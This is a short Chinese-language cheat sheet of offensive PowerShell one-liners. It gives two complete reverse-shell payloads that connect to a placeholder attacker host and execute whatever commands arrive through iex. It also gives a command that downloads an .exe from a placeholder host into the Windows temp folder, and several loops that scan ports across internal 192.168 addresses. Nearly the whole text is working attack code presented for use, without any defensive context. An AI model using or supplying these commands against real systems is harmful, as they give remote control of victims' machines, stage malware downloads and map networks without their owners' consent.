Powershell反弹命令
$client=New-Object Net.Sockets.TCPClient('x.x.x.x',22); $stream=$client.GetStream(); [byte[]]$bytes=0..65535|%{0}; while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){; $data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback=(iex $data 2>&1 | Out-String); $sendback2=$sendback + 'PS ' + (pwd).Path + '> '; $sendbyte=([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()
命令行一步到位:
powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('x.x.x.x',8888);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Powershell下载文件
powershell -nop -c "$client=new-object System.Net.WebClient;$client.DownloadFile('http://x.x.x.x/o.exe', 'c:\windows\temp\o.exe')"
powershell扫描内网某台机器的端口
1..9999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.1",$_)) "Port $_ is open!"} 2>$null
powershell扫描内网范围单一端口
foreach ($ip in 1..255) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
扫描某个ip段的端口范围
1..255 | % { $a = $_; 1..999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.$a",$_)) "Port $_ is open!"} 2>$null}